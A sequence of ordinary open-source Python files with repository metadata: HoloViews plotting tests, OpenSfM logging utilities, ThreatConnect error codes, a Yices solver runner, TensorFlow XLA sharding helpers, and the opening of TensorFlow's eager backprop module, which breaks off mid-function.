curve = Curve(range(10)).options(xformatter=formatter)
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIs(xformatter, formatter)
def test_element_yformatter_instance(self):
formatter = PercentFormatter()
curve = Curve(range(10)).options(yformatter=formatter)
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIs(yformatter, formatter)
def test_element_zformatter_instance(self):
formatter = PercentFormatter()
curve = Scatter3D([]).options(zformatter=formatter)
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIs(zformatter, formatter)
class TestColorbarPlot(TestMPLPlot):
def test_colormapper_unsigned_int(self):
img = Image(np.array([[1, 1, 1, 2], [2, 2, 3, 4]]).astype('uint16'))
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (1, 4))
def test_colormapper_symmetric(self):
img = Image(np.array([[0, 1], [2, 3]])).options(symmetric=True)
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (-3, 3))
def test_colormapper_clims(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clims=(0, 4))
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (0, 4))
def test_colormapper_color_levels(self):
img = Image(np.array([[0, 1], [2, 3]])).options(color_levels=5)
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(len(artist.cmap.colors), 5)
def test_colormapper_transparent_nan(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clipping_colors={'NaN': 'transparent'})
plot = mpl_renderer.get_plot(img)
cmap = plot.handles['artist'].cmap
self.assertEqual(cmap._rgba_bad, (1.0, 1.0, 1.0, 0))
def test_colormapper_min_max_colors(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clipping_colors={'min': 'red', 'max': 'blue'})
plot = mpl_renderer.get_plot(img)
cmap = plot.handles['artist'].cmap
self.assertEqual(cmap._rgba_under, (1.0, 0, 0, 1))
self.assertEqual(cmap._rgba_over, (0, 0, 1.0, 1))
def test_colorbar_label(self):
scatter = Scatter(np.random.rand(100, 3), vdims=["y", "color"]).options(color_index=2, colorbar=True)
plot = mpl_renderer.get_plot(scatter)
cbar_ax = plot.handles['cax']
self.assertEqual(cbar_ax.get_ylabel(), 'color')
def test_colorbar_empty_clabel(self):
img = Image(np.array([[1, 1, 1, 2], [2, 2, 3, 4]])).opts(clabel='', colorbar=True)
plot = mpl_renderer.get_plot(img)
colorbar = plot.handles['cax']
self.assertEqual(colorbar.get_label(), '')
def test_colorbar_label_style_mapping(self):
scatter = Scatter(np.random.rand(100, 3), vdims=["y", "color"]).options(color='color', colorbar=True)
plot = mpl_renderer.get_plot(scatter)
cbar_ax = plot.handles['cax']
self.assertEqual(cbar_ax.get_ylabel(), 'color')
class TestOverlayPlot(TestMPLPlot):
def test_overlay_legend_opts(self):
overlay = (
Curve(np.random.randn(10).cumsum(), label='A') *
Curve(np.random.randn(10).cumsum(), label='B')
).options(legend_opts={'framealpha': 0.5, 'facecolor': 'red'})
plot = mpl_renderer.get_plot(overlay)
legend_frame = plot.handles['legend'].get_frame()
self.assertEqual(legend_frame.get_alpha(), 0.5)
self.assertEqual(legend_frame.get_facecolor(), (1.0, 0.0, 0.0, 0.5))
| {
"content_hash": "fdadbcee364c93f6ccfb20a8d00bff3a",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 109,
"avg_line_length": 42.83410138248848,
"alnum_prop": 0.635933297471759,
"repo_name": "ioam/holoviews",
"id": "de06cbc2a9fb9e93acd1abb5ce55f1b5d1c06ce7",
"size": "9295",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "holoviews/tests/plotting/matplotlib/test_elementplot.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1546"
},
{
"name": "HTML",
"bytes": "18997"
},
{
"name": "JavaScript",
"bytes": "20747"
},
{
"name": "Jupyter Notebook",
"bytes": "1379"
},
{
"name": "Python",
"bytes": "3241652"
}
],
"symlink_target": ""
} |
import logging
import os
from typing import Optional
def setup() -> None:
logging.basicConfig(
format="%(asctime)s %(levelname)s: %(message)s", level=logging.DEBUG
)
def memory_available() -> Optional[int]:
"""Available memory in MB.
Only works on linux and returns None otherwise.
"""
lines = os.popen("free -t -m").readlines()
if not lines:
return None
available_mem = int(lines[1].split()[6])
return available_mem
| {
"content_hash": "d5360d98f5a6ec38d7af9bbfbdcbb18c",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 76,
"avg_line_length": 22.571428571428573,
"alnum_prop": 0.6392405063291139,
"repo_name": "mapillary/OpenSfM",
"id": "379a3a53be4f4294b97508a93bf439bd71c008e0",
"size": "474",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "opensfm/log.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "396"
},
{
"name": "C++",
"bytes": "648986"
},
{
"name": "CMake",
"bytes": "78367"
},
{
"name": "CSS",
"bytes": "6426"
},
{
"name": "Dockerfile",
"bytes": "642"
},
{
"name": "HTML",
"bytes": "63144"
},
{
"name": "JavaScript",
"bytes": "1054984"
},
{
"name": "Python",
"bytes": "1141169"
},
{
"name": "Shell",
"bytes": "4006"
}
],
"symlink_target": ""
} |
from enum import Enum
class ErrorCodes(Enum):
""" """
#
# NOTE: Testing to see if Enums as error codes is usable.
#
e0100 = 'Settings Error: ({0!s}).'
e0110 = 'Settings Error: ({0!s}) is an invalid value. API Request Timeout must be a integer.'
e0120 = 'Settings Error: ({0!s}) is an invalid value. API Retries must be a integer.'
e0130 = 'Settings Error: ({0!s}) is an invalid value. API Sleep must be a integer.'
e0140 = 'Settings Error: ({0!s}) is an invalid value. Max result counts must be a integer.'
#
# Resource Error Codes
#
e0500 = 'Resource Error: ({0!s}) is an invalid resource type. Resource types must be a ResourceKey enum.'
#
# Filter Error Codes
#
e1000 = 'Filter Error: ({0!s}) is an invalid filter operator. Filter Operators must be a FilterSetOperator Enum.'
e1010 = 'Filter Error: ({0!s}) is an invalid filter operator. Filter Operators must be a FilterOperator Enum.'
# group filters
e4000 = 'Filter Error: ({0!s}) is an invalid adversary ID. The adversary ID must be an integer.'
e4010 = 'Filter Error: ({0!s}) is an invalid document ID. The document ID must be an integer.'
e4020 = 'Filter Error: ({0!s}) is an invalid email ID. The email ID must be an integer.'
e4030 = 'Filter Error: ({0!s}) is an invalid ID. The ID must be an integer.'
e4040 = 'Filter Error: ({0!s}) is an invalid incident ID. The incident ID must be an integer.'
e4050 = 'Filter Error: ({0!s}) is an invalid Security Label. The Security Label must be a string.'
e4060 = 'Filter Error: ({0!s}) is an invalid signature ID. The signature ID must be an integer.'
e4070 = 'Filter Error: ({0!s}) is an invalid Tag. The Tag must be a string.'
e4080 = 'Filter Error: ({0!s}) is an invalid threat ID. The threat ID must be an integer.'
e4090 = 'Filter Error: ({0!s}) is an invalid victim ID. The victim ID must be an integer.'
# indicator filters
e5000 = 'Filter Error: ({0!s}) is an invalid Group ID. The Group ID must be an integer.'
e5001 = 'Filter Error: ({0!s}) is an invalid Group Type. The Group Type must be a GroupType Enum.'
e5010 = 'Filter Error: ({0!s}) is an invalid indicator.'
e5011 = 'Filter Error: ({0!s}) is an invalid indicator type. The Indicator Type must be an GroupType Enum.'
e5020 = 'Filter Error: ({0!s}) is an invalid Victim ID. The Victim ID must be an integer.'
e5100 = 'Filter Error: Only one type can be added to a filter. The current filter type is ({0!s}).'
# Request Object
e6000 = 'Request Object Error: {0!s} is not a valid HTTP method.'
#
# Resource Object Error Codes
#
e10000 = 'Resource Error: {0!s}'
e10010 = 'Resource Error: Confidence must be >= 0 and <=100. ({0!s}) is not in this range.'
e10011 = 'Resource Error: Confidence must be of integer type. ({0!s}) is not an integer value.'
e10012 = 'Resource Error: ({0!s}) was not found in id index.'
e10013 = 'Resource Error: ({0!s}) was not found in name index.'
e10020 = 'Resource Error: ID must be of integer type. ({0!s}) is not an integer value.'
e10030 = 'Resource Error: Resource Type is not configured for this object.'
e10040 = 'Resource Error: Cannot commit incomplete resource object.'
e10050 = 'Resource Error: {0!s} is an invalid indicator.'
# Indicator Resource Object
e10100 = 'Resource Error: DNS Active is not supported for this resource type.'
e10110 = 'Resource Error: DNS Resolutions is not supported for this resource type.'
e10120 = 'Resource Error: File Occurrences is not supported for this resource type.'
e10130 = 'Resource Error: Size is not supported for this resource type.'
e10140 = 'Resource Error: WhoIs Active is not supported for this resource type.'
e10150 = 'Resource Error: File Occurrences is not supported for this resource type.'
# Group Resource Object
e10200 = 'Resource Error: Body is not supported for this resource type.'
e10210 = 'Resource Error: Contents is not supported for this resource type.'
e10220 = 'Resource Error: Event Date is not supported for this resource type.'
e10230 = 'Resource Error: File Name is not supported for this resource type.'
e10240 = 'Resource Error: File Size is not supported for this resource type.'
e10250 = 'Resource Error: File Text is not supported for this resource type.'
e10260 = 'Resource Error: File Type is not supported for this resource type.'
e10270 = 'Resource Error: From is not supported for this resource type.'
e10280 = 'Resource Error: Header is not supported for this resource type.'
e10290 = 'Resource Error: Score is not supported for this resource type.'
e10300 = 'Resource Error: Subject is not supported for this resource type.'
e10310 = 'Resource Error: To is not supported for this resource type.'
e10320 = 'Resource Error: Download is not supported for this resource type.'
e10330 = 'Resource Error: Upload is not supported for this resource type.'
# Victim Resource Object
e10500 = 'Resource Error: Account is not supported for this resource type.'
e10510 = 'Resource Error: Address is not supported for this resource type.'
e10520 = 'Resource Error: Address Type is not supported for this resource type.'
e10530 = 'Resource Error: Network is not supported for this resource type.'
e10540 = 'Resource Error: Phone Type is not supported for this resource type.'
e10550 = 'Resource Error: ({0!s}) is an Invalid Victim Asset Type.'
e10560 = 'Resource Error: Website is not supported for this resource type.'
#
# API Errors
#
e80000 = 'API Error: {0!s}'
#
# Runtime Errors
#
e90000 = 'Resource object is not properly formatted. Missing get_id or get_name methods.'
e90001 = 'API returned failed status code.'
| {
"content_hash": "a405de18a11117c74f3d45360abdee1f",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 117,
"avg_line_length": 55.82857142857143,
"alnum_prop": 0.6847492323439099,
"repo_name": "percipient/threatconnect-python",
"id": "1de6f25b4f8baa561f7d2bc835d89fae4ae90a3b",
"size": "5862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "threatconnect/ErrorCodes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "381902"
}
],
"symlink_target": ""
} |
import os
import subprocess
import shlex
from tempfile import NamedTemporaryFile
import TimeoutThread
def run_command(command, time_out):
args = shlex.split(command)
proc = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=os.setsid)
with TimeoutThread.processTimeout(time_out, proc.pid):
stdout, stderr = proc.communicate()
resultcode = proc.wait()
return resultcode, stdout, stderr
def try_prog(prog_str):
with NamedTemporaryFile() as tmp_f:
tmp_f.write(prog_str)
tmp_f.flush()
result = run_command("./yices_main %s" % tmp_f.name, 3600000)
return result[1].find("unsat") is -1, result[1]
def onerange(n):
return [x+1 for x in range(n)]
| {
"content_hash": "553c6d67170dfdd8e3c2a49b1a6036de",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 27.607142857142858,
"alnum_prop": 0.6610608020698577,
"repo_name": "Wassasin/automatedreasoning",
"id": "c2d2187809d8457d0df37cdef25c3aafeec07a6a",
"size": "773",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proj1/src/util/common.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16020"
},
{
"name": "TeX",
"bytes": "45791"
}
],
"symlink_target": ""
} |
"""Experimental support for defining XLA shardings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as _np # Avoids becoming a part of public Tensorflow API.
from tensorflow.compiler.tf2xla.python import xla as tf2xla
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.core.framework import attr_value_pb2
class Sharding(object):
"""A class to support adding sharding attributes to Ops.
Use the factory constructors and then call apply_to_tensor:
Sharding.replicate().apply_to_tensor(tensor)
"""
def __init__(self, proto=None):
"""Do not use this constructor; use the factory functions below."""
self._proto = proto
@classmethod
def replicate(cls):
"""Returns a replicated sharding attribute.
This causes an op to be computed in its entirety independently on all
cores in the XLA device.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.REPLICATED))
@classmethod
def manual(cls):
"""Returns a manuall sharding attribute.
This means the op is manually partitioned by the user and XLA will not
change the shapes.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.MANUAL))
@classmethod
def assign_device(cls, core):
"""Returns an AssignDevice sharding attribute.
This causes an op to be computed in its entirety only on one core in
the XLA device.
Args:
core: The core to assign this Op to.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.MAXIMAL,
tile_assignment_dimensions=[1],
tile_assignment_devices=[core]))
@classmethod
def tile(cls, tile_assignment):
"""Returns a Tiled sharding attribute.
This causes an op to be partially computed on multiple cores in the
XLA device.
Args:
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
Raises:
TypeError: tile_assignment was not of np.array type.
TODO(jmolloy): This concept is nefarious and is not
something we really want to expose to users (especially as the
contract for tile_assignment is very strict).
"""
if not isinstance(tile_assignment, _np.ndarray):
raise TypeError('Tile assignment must be of type np.ndarray')
dims = list(tile_assignment.shape)
flattened_devices = tile_assignment.reshape(-1, order='C')
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=dims,
tile_assignment_devices=list(flattened_devices)))
@classmethod
def partial_tile(cls, tile_assignment):
"""Returns a partially tiled sharding attribute.
This is similar to tile(), but tile_assignment has one more dimension than
the tensor, and tiles in the last dimension of tile_assignment are
replicated.
Args:
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
Raises:
TypeError: tile_assignment was not of np.array type.
"""
if not isinstance(tile_assignment, _np.ndarray):
raise TypeError('PartialTile assignment must be of type np.ndarray')
dims = list(tile_assignment.shape)
flattened_devices = tile_assignment.reshape(-1, order='C')
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=dims,
tile_assignment_devices=list(flattened_devices),
replicate_on_last_tile_dim=True))
@classmethod
def split(cls, tensor, split_dimension, num_devices, input_shape=None):
"""Returns a Sharding that splits a tensor across a dimension.
This creates a Tiled attribute, similar to tile(), but easier to use for the
common case of tiling a tensor N ways in one dimension.
Args:
tensor: A tf.Tensor to split.
split_dimension: The dimension number to split.
num_devices: The number of cores to split `tensor` over.
input_shape: The shape of the original tensor.
Raises:
ValueError: The tensor to split was smaller in the split dimension than
the number of devices to split over.
"""
if input_shape:
shape = input_shape
else:
shape = tensor.shape.as_list()
if (shape[split_dimension] is not None and
shape[split_dimension] < num_devices):
raise ValueError('Split dimension was smaller than the required number '
'of splits: shape=%r, dimension=%r, num_devices=%r' %
(shape, split_dimension, num_devices))
tile_assignment_dims = [1] * len(shape)
tile_assignment_dims[split_dimension] = num_devices
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=tile_assignment_dims,
tile_assignment_devices=range(num_devices)))
def apply_to_tensor(self,
tensor,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Applies this Sharding attribute to `tensor`.
Args:
tensor: A tf.Tensor to split.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: whether to create a sharding op on `tensor`.
Returns:
The tensor with Sharding attribute.
"""
proto = self._proto
if use_sharding_op:
if assign_tuple_sharding:
proto = self._create_tuple_proto(num_outputs=1)
tensor = tf2xla.sharding(tensor, sharding=proto.SerializeToString())
else:
tensor = tf2xla.sharding(
tensor, sharding=proto.SerializeToString())
elif assign_tuple_sharding or len(tensor.op.outputs) > 1:
proto = self._get_or_create_tuple_proto(tensor.op)
# We can't mutate an element of old_proto.tuple_shardings, so create
# a new proto.
tuple_shardings = list(proto.tuple_shardings)
tuple_shardings[tensor.value_index] = self._proto
proto = xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.TUPLE, tuple_shardings=tuple_shardings)
# TODO(jmolloy): This need to be seriously revisited before declaring this
# API available for public use.
# pylint: disable=protected-access
tensor.op._set_attr('_XlaSharding',
attr_value_pb2.AttrValue(s=proto.SerializeToString()))
return tensor
def apply_to_operation(self, operation):
"""Applies this Sharding attribute to `operation`.
Args:
operation: A tf.Operation to add sharding annotation.
"""
attr_value = attr_value_pb2.AttrValue(s=self._proto.SerializeToString())
# pylint: disable=protected-access
operation._set_attr('_XlaSharding', attr_value)
@property
def proto(self):
"""Return the sharding protobuf of type xla_data_pb2.OpSharding."""
return self._proto
def _get_or_create_tuple_proto(self, op):
try:
attr = op.get_attr('_XlaSharding')
proto = xla_data_pb2.OpSharding()
proto.ParseFromString(attr)
return proto
except ValueError:
return self._create_tuple_proto(len(op.outputs))
def _create_tuple_proto(self, num_outputs):
shardings = [
xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.REPLICATED)
] * num_outputs
return xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.TUPLE, tuple_shardings=shardings)
def copy_sharding(from_tensor, to_tensor, use_sharding_op=False):
"""Copies the a tensor's sharding to another.
Args:
from_tensor: Source tensor. Must be the sole output of an op.
to_tensor: the tensor the annotate with the copy.
use_sharding_op: whether to create a sharding op on `to_tensor`.
Returns:
A tensor with sharding annotation copied from `from_tensor`.
"""
sharding = get_tensor_sharding(from_tensor)
if sharding is None:
return to_tensor
if use_sharding_op:
to_tensor = tf2xla.sharding(to_tensor, sharding=sharding)
attr_value = attr_value_pb2.AttrValue(s=sharding)
# pylint: disable=protected-access
to_tensor.op._set_attr('_XlaSharding', attr_value)
return to_tensor
# Helpers for the above factory functions that allow easy application of
# shardings, for example:
# tensor = xla_sharding.replicate(tensor)
def replicate(tensor, assign_tuple_sharding=False, use_sharding_op=False):
return Sharding.replicate().apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def assign_device(tensor,
device,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Returns a tensor that has AssignDevice sharding attribute."""
return Sharding.assign_device(device).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def tile(tensor,
tile_assignment,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Returns a tensor that has tiled sharding.
Args:
tensor: A tf.Tensor to shard.
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: If true, adds a sharding op to set the sharding.
"""
return Sharding.tile(tile_assignment).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def split(tensor,
split_dimension,
num_devices,
assign_tuple_sharding=False,
use_sharding_op=False,
input_shape=None):
"""Returns a tensor that is split along the given dimension.
Args:
tensor: A tf.Tensor to split.
split_dimension: The dimension to split.
num_devices: The number of devices to partition the dimension.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: If true, adds a sharding op to set the sharding.
input_shape: The full shape of the input tensor.
"""
return Sharding.split(tensor, split_dimension, num_devices,
input_shape).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def partial_tile(tensor, tile_assignment, use_sharding_op=False):
"""Returns a tensor that has tiled sharding.
Args:
tensor: A tf.Tensor to shard.
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology. It must have one
more dimension than tensor, and the last dimension represents partially
replicated tiles.
use_sharding_op: If true, adds a sharding op to set the sharding.
"""
return Sharding.partial_tile(tile_assignment).apply_to_tensor(
tensor, use_sharding_op=use_sharding_op)
def get_op_sharding(op):
"""Returns sharding attribute of an op.
Args:
op: a TensorFlow op.
Returns:
The attribute representing XLA sharding on this op.
"""
try:
return op.get_attr('_XlaSharding')
except ValueError:
return None
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return None
def get_tensor_sharding(tensor):
"""Returns sharding attribute of a Tensor.
Args:
tensor: a Tensor.
Returns:
The attribute representing XLA sharding on tensor's op.
"""
try:
return get_op_sharding(tensor.op)
except AttributeError:
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
return None
def get_sharding_tile_shape(sharding):
"""Returns the tile assignment shape for a sharded Tensor.
Args:
sharding: a serialized OpSharding message describing the layout of a
sharded Tensor.
Returns:
A list, for each dimension of the sharded Tensor, of the number of shards
into which it has been split. Returns None if the input indicates no tile
assignments.
"""
if sharding is None:
return None
sharding_message = xla_data_pb2.OpSharding()
sharding_message.ParseFromString(sharding)
if sharding_message.tile_assignment_dimensions:
return sharding_message.tile_assignment_dimensions
else:
return None
def auto_to_manual_spmd_partition(tensor, manual_sharding):
"""Switches from automatic SPMD partitioning to manual partitioning.
Converts a full-shaped tensor (to be automatically partitioned by SPMD
partitioner) to a shard-shaped tensor to be consumed by manually partitioned
ops.
Args:
tensor: A tf.Tensor in full shape.
manual_sharding: a serialized string of OpSharding to be used in manual
partitioning.
Returns:
A shard-shaped tensor to be consumed by manually partitioned ops.
"""
return tf2xla.spmd_full_to_shard_shape(
tensor, manual_sharding=manual_sharding)
def manual_to_auto_spmd_partition(tensor, manual_sharding, full_shape):
"""Switches from manual partitioning to automatic SPMD partitioning.
Converts a shard-shaped tensor (manually partitioned in SPMD-style) to a
full-shaped tensor to be partitioned automatically by the SPMD partitioner.
Args:
tensor: A tf.Tensor in shard shape.
manual_sharding: a serialized string of OpSharding to be used in manual
partitioning.
full_shape: the shape of tensor before partitioning.
Returns:
A full-shaped tensor to be partitioned automatically by the SPMD
partitioner.
"""
return tf2xla.spmd_shard_to_full_shape(
tensor, manual_sharding=manual_sharding, full_shape=full_shape)
def mesh_split_sharding(device_mesh, tensor_split_dims_mapping):
"""Returns a Sharding object representing sharding along multiple dimensions.
Args:
device_mesh: An np.ndarray describing the topology of the device mesh and
each element is the ID of the device in the topology.
tensor_split_dims_mapping: A list of integers that map each tensor axis to
the device mesh axis along which it is sharded. Its length is the tensor
rank, and tensor_split_dims_mapping[i] is device mesh axis for tensor
dimension i. Use -1 for tensor dimensions that are not sharded.
Raises:
ValueError: The number of tensor split dimensions is larger than device mesh
rank.
"""
permutation = [d for d in tensor_split_dims_mapping if d >= 0]
if len(permutation) > len(device_mesh.shape):
raise ValueError(
'Number of tensor split dimensions (%r) is larger than device mesh '
'rank (%r). tensor_split_dims_mapping: %r, device_mesh.shape: %r' %
(len(permutation), len(
device_mesh.shape), tensor_split_dims_mapping, device_mesh.shape))
# Append replicated dimensions to the end.
transpose_permutation = permutation + [
d for d in range(len(device_mesh.shape)) if d not in permutation
]
tile_assignment = _np.transpose(device_mesh, transpose_permutation)
tile_shape = [
1 if d < 0 else device_mesh.shape[d] for d in tensor_split_dims_mapping
]
partial = len(permutation) < len(device_mesh.shape)
if partial:
tile_shape.append(_np.prod(device_mesh.shape) // _np.prod(tile_shape))
tile_assignment = _np.reshape(tile_assignment, tile_shape)
if partial:
return Sharding.partial_tile(tile_assignment)
return Sharding.tile(tile_assignment)
def mesh_split(tensor,
device_mesh,
tensor_split_dims_mapping,
use_sharding_op=False):
"""Returns a tensor that is split along multiple dimensions in a device mesh.
Args:
tensor: A tf.Tensor to split.
device_mesh: An np.ndarray describing the topology of the device mesh and
each element is the ID of the device in the topology.
tensor_split_dims_mapping: A list of integers that map each tensor axis to
the device mesh axis along which it is sharded. Its length is the tensor
rank, and tensor_split_dims_mapping[i] is device mesh axis for tensor
dimension i. Use -1 for tensor dimensions that are not sharded.
use_sharding_op: If true, adds a sharding op to set the sharding.
Raises:
ValueError: The number of tensor split dimensions is larger than device mesh
rank.
"""
sharding = mesh_split_sharding(device_mesh, tensor_split_dims_mapping)
return sharding.apply_to_tensor(tensor, use_sharding_op=use_sharding_op)
| {
"content_hash": "6e003bd0d50272ac4366d7c39a42b61c",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 80,
"avg_line_length": 35.13179916317991,
"alnum_prop": 0.6904067170844995,
"repo_name": "petewarden/tensorflow",
"id": "0f1dcd89302dd32de9203e3b299aa191c1b53bdc",
"size": "17442",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/compiler/xla/experimental/xla_sharding/xla_sharding.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31796"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "895451"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82100676"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "112853"
},
{
"name": "Go",
"bytes": "1867248"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "984477"
},
{
"name": "Jupyter Notebook",
"bytes": "550862"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1982867"
},
{
"name": "Makefile",
"bytes": "66496"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "317461"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37425809"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "8992"
},
{
"name": "Shell",
"bytes": "700106"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3613406"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""Code for backpropagation using the tape utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import operator
import threading
import six
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import imperative_grad
from tensorflow.python.eager import tape
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
_op_attr_type_cache = {}
def op_attr_type(op_type, attr_name):
try:
return _op_attr_type_cache[(op_type, attr_name)]
except KeyError:
with errors.raise_exception_on_not_ok_status() as status:
h = context.context()._handle # pylint: disable=protected-access
attr_type = pywrap_tensorflow.TFE_OpNameGetAttrType(
h, op_type, attr_name, status)
_op_attr_type_cache[(op_type, attr_name)] = attr_type
return attr_type
def make_attr(attr_type, value):
if attr_type == pywrap_tensorflow.TF_ATTR_TYPE:
return dtypes.as_dtype(value)
elif attr_type == [pywrap_tensorflow.TF_ATTR_TYPE]:
return [dtypes.as_dtype(v) for v in value]
elif attr_type == pywrap_tensorflow.TF_ATTR_SHAPE:
return tensor_shape.as_shape(value).as_proto()
elif attr_type == [pywrap_tensorflow.TF_ATTR_SHAPE]:
return [tensor_shape.as_shape(v).as_proto() for v in value]
return value
class _MockOp(object):
"""Pretends to be a tf.Operation for the gradient functions."""
def __init__(self, attrs, inputs, outputs, typ):
self.attrs = attrs
self.inputs = inputs
self.outputs = outputs
self.type = typ
def get_attr(self, attr):
typ = op_attr_type(self.type, attr)
for i in range(0, len(self.attrs), 2):
if self.attrs[i] == attr:
return make_attr(typ, self.attrs[i + 1])
raise KeyError(attr)
def _magic_gradient_function(op_name, attr_tuple, num_inputs,
inputs, outputs, out_grads):
"""Calls the gradient function of the op.
Args:
op_name: the name of the op to be differentiated.
attr_tuple: the attrs, as a tuple.
num_inputs: the number of inputs to the op.
inputs: inputs to the original operation.
outputs: outputs to the original operation.
out_grads: gradients of the operation wrt its outputs.
Returns:
The gradients with respect to the inputs of the function, as a list.
"""
mock_op = _MockOp(attr_tuple, inputs, outputs, op_name)
grad_fn = ops._gradient_registry.lookup(op_name) # pylint: disable=protected-access
if grad_fn is None:
return [None] * num_inputs
return grad_fn(mock_op, *out_grads)
_gradient_functions = {}
_gradient_functions_lock = threading.Lock()
_tracing = False
# TODO(agarwal): use an automatic mechanism for handling None arguments to
# gradient functions.
# Some gradient functions can accept None arguments for gradients. The following
# maps the operation name to the indices at which the corresponding gradient
# function can accept None values.
# e.g. FusedBatchNorm outputs 5 values and hence receives 5 gradient values
# during backprop. However the gradient function uses only the first of those
# values and ignores the rest. The entry, "FusedBatchNorm": [1, 2, 3, 4],
# indicates that only the gradient corresponding to index 0 is used, and the
# gradient values at indices 1-4 are ignored (and hence can be None). The
# backprop algorithm can then leverage this by not constructing zeros to
# pass for those indices.
_grad_fn_accepts_none_for_indices = {
"SoftmaxCrossEntropyWithLogits": [1],
"FusedBatchNorm": [1, 2, 3, 4]
}
def _get_backward_fn(op_name, attrs, num_inputs, op_inputs, op_outputs):
def grad_fn(*orig_outputs):
